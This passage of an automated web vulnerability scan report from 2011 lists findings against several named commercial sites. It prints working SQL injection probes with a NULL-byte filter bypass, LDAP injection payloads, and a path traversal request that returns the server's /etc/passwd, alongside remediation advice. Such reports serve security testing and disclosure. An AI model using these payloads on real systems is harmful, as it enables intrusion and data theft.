20.4. http://googleads.g.doubleclick.net/pagead/ads

20.5. http://googleads.g.doubleclick.net/pagead/ads

20.6. http://googleads.g.doubleclick.net/pagead/ads

20.7. http://pub.retailer-amazon.net/banner_120_600_b.php

20.8. http://r1-ads.ace.advertising.com/site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F

20.9. https://secure.lifelock.com/enrollment

20.10. https://secure.lifelock.com/portal/login

20.11. http://www.hotelclub.com/common/adRevresda.asp

20.12. http://www.hotelclub.com/common/adRevresda.asp

20.13. http://www.identityguard.com/gscc.aspx

20.14. http://www.identityguard.com/ipages/le4/letp30daysfree1.html

20.15. http://www.lifelock.com/about/leadership/management/

20.16. http://www.lifelock.com/about/lifelock-in-the-community/

20.17. http://www.lifelock.com/guarantee/

20.18. http://www.lifelock.com/how-it-works/

20.19. http://www.lifelock.com/identity-theft/

20.20. http://www.lifelock.com/offers/faces/female/

20.21. http://www.nextadvisor.com/favicon.ico

20.22. https://www.pcisecuritystandards.org/

20.23. http://www.securepaynet.net/default.aspx

20.24. https://www.trustedid.com/registration.php

20.25. https://www.trustedid.com/suzeidprotector/

21. TRACE method is enabled

21.1. http://2byto.com/

21.2. http://affiliate.idgtracker.com/

21.3. http://analytic.hotelclub.com/

21.4. http://bh.contextweb.com/

21.5. http://bp.specificclick.net/

21.6. http://i35.tinypic.com/

21.7. https://secure.identityguard.com/

21.8. https://secure.lifelock.com/

21.9. http://widgets.digg.com/

21.10. http://www.nextadvisor.com/

21.11. http://www.simpatie.ro/

22. Email addresses disclosed

22.1. http://kroogy.com/search/js/ColorPicker2.js

22.2. http://kroogy.com/search/js/prototype.lite.js

22.3. http://www.hotelclub.com/Common/Scripts/s_code_HC.js

22.4. http://www.lifelock.com/about/leadership/management/

22.5. http://www.lifelock.com/about/lifelock-in-the-community/

22.6. http://www.lifelock.com/guarantee/

22.7. http://www.lifelock.com/how-it-works/

22.8. http://www.lifelock.com/identity-theft/

22.9. http://www.lifelock.com/scripts/jquery.colorbox.min.js

22.10. http://www.lifelock.com/scripts/lifelock.js

22.11. http://www.nextadvisor.com/includes/javascript.php

22.12. http://www.nextadvisor.com/includes/javascript.php

22.13. http://www.nextadvisor.com/includes/javascript.php

22.14. https://www.pcisecuritystandards.org/

22.15. https://www.pcisecuritystandards.org/js/jquery.cookie.js

23. Credit card numbers disclosed

24. Robots.txt file

24.1. http://2byto.com/bluepixel/cnt-gif1x1.php

24.2. http://ad.amgdgt.com/ads/

24.3. http://ad.doubleclick.net/ad/N5047.adwords.google.com/B4529920.12

24.4. http://affiliate.idgtracker.com/rd/r.php

24.5. http://ajax.googleapis.com/ajax/services/feed/load

24.6. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197

24.7. http://apnxscm.ac3.msn.com:81/CACMSH.ashx

24.8. http://at.amgdgt.com/ads/

24.9. http://b.scorecardresearch.com/p

24.10. http://b.voicefive.com/b

24.11. http://clients1.google.com/complete/search

24.12. http://clk.atdmt.com/go/253732016/direct

24.13. http://cm.g.doubleclick.net/pixel

24.14. http://data.coremetrics.com/cm

24.15. http://ec.atdmt.com/ds/5RTLCLFLKLFL/v132_lockman/v132_lockman_v3_LockManSSCard_160x600.swf

24.16. http://es.optimost.com/es/633/c/2/u/live.js

24.17. http://evintl-aia.verisign.com/EVIntl2006.cer

24.18. http://exch.quantserve.com/pixel/p-03tSqaTFVs1ls.gif

24.19. http://fls.doubleclick.net/activityi

24.20. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1047949563/

24.21. http://i35.tinypic.com/vx4ox.jpg

24.22. http://img.securepaynet.net/image.aspx

24.23. http://img1.wsimg.com/rcc/portraittemplates/img_resell_model_m2.jpg

24.24. http://img3.wsimg.com/fastball/js_lib/FastballLibrary0005.js

24.25. http://leadback.netseer.com/dsatserving2/servlet/pixel

24.26. http://media.compete.com/downblouse.de_uv_460.png

24.27. http://pagead2.googlesyndication.com/pagead/gen_204

24.28. http://partners.nextadnetwork.com/tracking/js.html

24.29. http://pixel.mathtag.com/event/img

24.30. http://s0.2mdn.net/3095006/mpcs_040111_160x600_gm_android_1_fl.swf

24.31. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYsv4CILb-AioFNb8AAAMyBTK_AAAH

24.32. http://safebrowsing.clients.google.com/safebrowsing/downloads

24.33. https://secure.identityguard.com/EnrollmentStep1

24.34. http://spe.atdmt.com/ds/5RTLCLFLKLFL/v120_myidmylife/v120_myidmylife_v3_job_728x90.swf

24.35. http://switch.atdmt.com/jaction/LifeLock_Landing_Page

24.36. http://toolbarqueries.clients.google.com/tbproxy/af/query

24.37. http://tools.google.com/service/update2

24.38. http://tracking.keywordmax.com/tracking/show.php

24.39. http://widgets.digg.com/buttons/count

24.40. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

24.41. http://www.dictof.com/

24.42. http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH

24.43. http://www.equifax.com/siteUnavailableCorp.html

24.44. http://www.google-analytics.com/__utm.gif

24.45. http://www.google.com/coop/cse/brand

24.46. http://www.googleadservices.com/pagead/conversion/1047949563/

24.47. http://www.hostingcatalog.com/1x1s.gif

24.48. http://www.hotelclub.com/HCRefreshAshx/HttpCombiner.ashx

24.49. http://www.identityguard.com/gscc.aspx

24.50. http://www.keywordmax.com/tracking/show.php

24.51. http://www.kqzyfj.com/click-1911961-10751987

24.52. http://www.lifelock.com/about/lifelock-in-the-community/

24.53. http://www.nextadvisor.com/pmid/

24.54. http://www.securepaynet.net/default.aspx

24.55. http://www.tqlkg.com/image-1911961-10775457

24.56. https://www.trustedid.com/idfide01/

25. Cacheable HTTPS response

25.1. https://www.pcisecuritystandards.org/

25.2. https://www.pcisecuritystandards.org/documents/pci_dss_v2.pdf

25.3. https://www.pcisecuritystandards.org/favicon.ico

26. HTML does not specify charset

26.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15

26.2. http://breathe.c3metrics.com/c3realview.js

26.3. http://fls.doubleclick.net/activityi

26.4. http://kroogy.com/favicon.ico

26.5. http://kroogy.com/index/livesearch&q=s&type=web

26.6. http://kroogy.com/index/livesearch&q=si&type=web

26.7. http://kroogy.com/index/livesearch&q=sit&type=web

26.8. http://kroogy.com/index/livesearch&q=site&type=web

26.9. http://kroogy.com/index/livesearch&q=site:&type=web

26.10. http://kroogy.com/pub/banner_728_90_random.php

26.11. http://kroogy.com/search/images/blank.gif

26.12. http://kroogy.com/search/random.php

26.13. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471

26.14. http://pub.retailer-amazon.net/banner_120_600_a.php

26.15. http://pub.retailer-amazon.net/banner_120_600_b.php

26.16. http://switch.atdmt.com/jaction/LifeLock_Landing_Page

26.17. http://www.hotelclub.com/blank.htm

26.18. http://www.hotelclub.com/common/adRevresda.asp

26.19. http://www.identityguard.com/ipages/le4/styles/ie.css

26.20. http://www.nextadvisor.com/includes/javascript.php

26.21. http://www.nextadvisor.com/link.php

27. Content type incorrectly stated

27.1. http://ar.voicefive.com/b/rc.pli

27.2. http://b2p.imgsrc.ru/b/blubberattack/1/16692341HbK.jpg

27.3. http://b2p.imgsrc.ru/b/blubberattack/8/13414178bpL.jpg

27.4. http://breathe.c3metrics.com/c3realview.js

27.5. http://event.adxpose.com/event.flow

27.6. http://evintl-aia.verisign.com/EVIntl2006.cer

27.7. http://img1.wsimg.com/rcc/portraittemplates/img_resell_model_m2.jpg

27.8. http://sales.liveperson.net/hcp/html/mTag.js

27.9. http://switch.atdmt.com/jaction/LifeLock_Landing_Page

27.10. http://www.dictof.com/favicon.ico

27.11. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg

27.12. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg

27.13. http://www.nextadvisor.com/images/phonepowerlogo.gif

27.14. http://www.nextadvisor.com/includes/javascript.php

27.15. http://www.nextadvisor.com/link.php

27.16. https://www.pcisecuritystandards.org/favicon.ico



1. SQL injection  next
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197 [REST URL parameter 3]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://analytic.hotelclub.com
Path:   /b/ss/flairviewhcprod/1/H.17/s84063693960197

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/flairviewhcprod%00'/1/H.17/s84063693960197?AQB=1&pccr=true&vidn=26DA09858516231B-400001A4A00530FD&&ndh=1&t=24/3/2011%207%3A9%3A50%200%20300&ce=ISO-8859-1&ns=flairviewtravel&pageName=Homepage&g=http%3A//www.hotelclub.com/&cc=USD&ch=Home%20page&server=www.hotelclub.com&v0=0&events=event7%2Cevent19%2Cevent4&v2=EN&c3=www.hotelclub.com&c4=EN&v5=www.hotelclub.com&v12=Non-member&v21=www.hotelclub.com&v29=USD&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: analytic.hotelclub.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-2165807168.30147192:lv=1303643390479:ss=1303643390479; s_cc=true; s_lp=yes; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DA09858516231B-400001A4A00530FD[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 12:33:17 GMT
Server: Omniture DC/2.0.0
Content-Length: 420
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/flairviewhcprod was not found on this server.</
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/flairviewhcprod%00''/1/H.17/s84063693960197?AQB=1&pccr=true&vidn=26DA09858516231B-400001A4A00530FD&&ndh=1&t=24/3/2011%207%3A9%3A50%200%20300&ce=ISO-8859-1&ns=flairviewtravel&pageName=Homepage&g=http%3A//www.hotelclub.com/&cc=USD&ch=Home%20page&server=www.hotelclub.com&v0=0&events=event7%2Cevent19%2Cevent4&v2=EN&c3=www.hotelclub.com&c4=EN&v5=www.hotelclub.com&v12=Non-member&v21=www.hotelclub.com&v29=USD&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=980&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: analytic.hotelclub.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-2165807168.30147192:lv=1303643390479:ss=1303643390479; s_cc=true; s_lp=yes; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DA09858516231B-400001A4A00530FD[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 12:33:17 GMT
Server: Omniture DC/2.0.0
xserver: www432
Content-Length: 0
Content-Type: text/html


1.2. http://www.hotelclub.com/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hotelclub.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
ntCoent-Length: 15330
Content-Type: text/html; Charset=windows-1252
Expires: Sun, 24 Apr 2011 13:12:24 GMT
Cache-Control: private
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 13:13:25 GMT
Connection: close
Set-Cookie: anon=47837466001520110424230132; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCQRQCTQ=EJPPCPBAEFOGKJENLHANBPKN; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273245525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 15330


<html>
<head>


<title>Under Maintenance</title>
<meta name=robots content=noindex,nofollow>
<meta name='DCSext.er' content="500;100"/>


<link rel="stylesheet" id="main-css" href="/Pri
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Cteonnt-Length: 232749
Content-Type: text/html; Charset=windows-1252
Expires: Sat, 23 Apr 2011 13:13:26 GMT
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 13:13:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: HTC=AppVer=1%2E0; path=/
Set-Cookie: AffiliateLogID=%2D1963682291; expires=Mon, 23-May-2011 14:00:00 GMT; path=/
Set-Cookie: anon=58210390806120110424230132; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDQSSAQDRQ=GADPBCECLCOALKJPEFJPNLOE; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273c45525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 232749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

1.3. http://www.nextadvisor.com/link.php [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nextadvisor.com
Path:   /link.php

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /link.php?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idtheftshield&id=227 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1'; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:20:05 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 51922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta name="msvalidate.01
...[SNIP]...
</strong> Affordable web host for intermediate users, though installation problems; no domain privacy and advertising on error pages are drawbacks</div>
...[SNIP]...

Request 2

GET /link.php?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idtheftshield&id=227 HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1''; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:20:08 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 41061


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta name="msvalidate.01
...[SNIP]...

2. File path traversal  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The script parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload ../../../../../../../../../../proc/cpuinfo../../../../../../../../etc/passwd was submitted in the script parameter. The requested file was returned in the application's response.

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, and by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:

Request

GET /includes/javascript.php?script=../../../../../../../../../../proc/cpuinfo../../../../../../../../etc/passwd HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:06:28 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Vary: Accept-Encoding
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 1830

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL
...[SNIP]...

3. LDAP injection  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 6b8420a4611b3464)(sn=* and 6b8420a4611b3464)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /bmx3/broker.pli?pid=6b8420a4611b3464)(sn=*&PRAd=253735207&AR_C=186884836 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-1303349046

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:09:53 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_6b8420a4611b3464&#41;&#40;sn=exp=1&initExp=Sun Apr 24 12:09:53 2011&recExp=Sun Apr 24 12:09:53 2011&prad=253735207&arc=186884836&; expires=Sat 23-Jul-2011 12:09:53 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303646993; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=6b8420a4611b3464)!(sn=*&PRAd=253735207&AR_C=186884836 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-1303349046

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:09:53 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_6b8420a4611b3464&#41;!&#40;sn=exp=1&initExp=Sun Apr 24 12:09:53 2011&recExp=Sun Apr 24 12:09:53 2011&prad=253735207&arc=186884836&; expires=Sat 23-Jul-2011 12:09:53 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303646993; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

4. XPath injection  previous  next

Summary

